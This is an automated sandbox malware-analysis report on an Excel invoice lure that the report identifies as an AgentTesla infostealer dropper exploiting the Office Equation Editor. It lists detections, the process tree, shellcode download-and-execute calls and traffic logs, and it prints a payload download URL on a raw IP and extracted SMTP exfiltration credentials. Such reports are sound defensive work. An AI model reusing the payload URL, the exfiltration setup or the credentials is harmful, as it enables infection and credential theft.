Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revised Invoice.xlsx

Overview

General Information

Sample Name:Revised Invoice.xlsx
Analysis ID:673697
MD5:2474f47dd5cb99a8913fbc95f164fd38
SHA1:42bb89241b10c90a4b52d07bd31b9735ca41f5d5
SHA256:be9f68f2284f924ae4696b48aa4c1ff5b771af13b09c8672f07cd600e4169370
Tags:VelvetSweatshopxlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2384 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 772 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • regasm_svchost.exe (PID: 2364 cmdline: "C:\Users\Public\regasm_svchost.exe" MD5: D55AB6E5A705E970AD32977BE467294E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "ventas@bluemix.cl", "Password": "bluemix2020737", "Host": "mail.bluemix.cl"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.988019664.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000000.988019664.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000006.00000000.987598461.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000000.987598461.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000006.00000002.1168247858.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.regasm_svchost.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              6.2.regasm_svchost.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.2.regasm_svchost.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32cc1:$s10: logins
                • 0x32728:$s11: credential
                • 0x2ed0d:$g1: get_Clipboard
                • 0x2ed1b:$g2: get_Keyboard
                • 0x2ed28:$g3: get_Password
                • 0x30003:$g4: get_CtrlKeyDown
                • 0x30013:$g5: get_ShiftKeyDown
                • 0x30024:$g6: get_AltKeyDown
                2.2.EQNEDT32.EXE.31daa8.0.raw.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
                • 0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                • 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
                6.0.regasm_svchost.exe.400000.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 23 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.174.138.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 772, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: Revised Invoice.xlsxVirustotal: Detection: 44%Perma Link
                  Source: Revised Invoice.xlsxReversingLabs: Detection: 29%
                  Antivirus detection for URL or domain
                  Source: http://107.174.138.192/ObliNMm2L89TSKT.exeAvira URL Cloud: Label: malware
                  Source: http://107.174.138.192/ObliNMm2L89TSKT.exejAvira URL Cloud: Label: malware
                  Source: http://107.174.138.192/ObliNMm2L89TSKT.exeeAvira URL Cloud: Label: malware
                  Source: http://107.174.138.192/ObliNMm2L89TSKT.exettC:Avira URL Cloud: Label: malware
                  Source: http://107.174.138.192/ObliNMm2L89TSKT.exe~Avira URL Cloud: Label: malware
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exeMetadefender: Detection: 37%Perma Link
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exeReversingLabs: Detection: 73%
                  Source: C:\Users\Public\regasm_svchost.exeMetadefender: Detection: 37%Perma Link
                  Source: C:\Users\Public\regasm_svchost.exeReversingLabs: Detection: 73%
                  Machine Learning detection for dropped file
                  Source: C:\Users\Public\regasm_svchost.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exeJoe Sandbox ML: detected
                  Source: 6.0.regasm_svchost.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                  Source: 6.0.regasm_svchost.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                  Source: 6.0.regasm_svchost.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                  Source: 6.0.regasm_svchost.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                  Source: 6.0.regasm_svchost.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                  Source: 6.0.regasm_svchost.exe.400000.9.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "ventas@bluemix.cl", "Password": "bluemix2020737", "Host": "mail.bluemix.cl"}

                  Exploits

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm_svchost.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm_svchost.exeJump to behavior
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.174.138.192 Port: 80Jump to behavior
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                  Software Vulnerabilities

                  barindex
                  Shellcode detected
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035704DE URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035704DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357045D LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_0357045D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357053F ShellExecuteExW,ExitProcess,2_2_0357053F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035703D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035703D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035701D2 URLDownloadToFileW,2_2_035701D2
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570250 URLDownloadToFileW,2_2_03570250
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035705DD URLDownloadToFileW,2_2_035705DD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357055D ExitProcess,2_2_0357055D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357034F URLDownloadToFileW,2_2_0357034F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570477 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570477
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035703A2 ExitProcess,2_2_035703A2
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570528 ShellExecuteExW,ExitProcess,2_2_03570528
                  Source: global trafficDNS query: name: mail.bluemix.cl
                  Source: global trafficDNS query: name: mail.bluemix.cl
                  Source: global trafficDNS query: name: mail.bluemix.cl
                  Source: global trafficDNS query: name: mail.bluemix.cl
                  Source: global trafficDNS query: name: mail.bluemix.cl
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 107.174.138.192:80
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 107.174.138.192:80 -> 192.168.2.22:49173
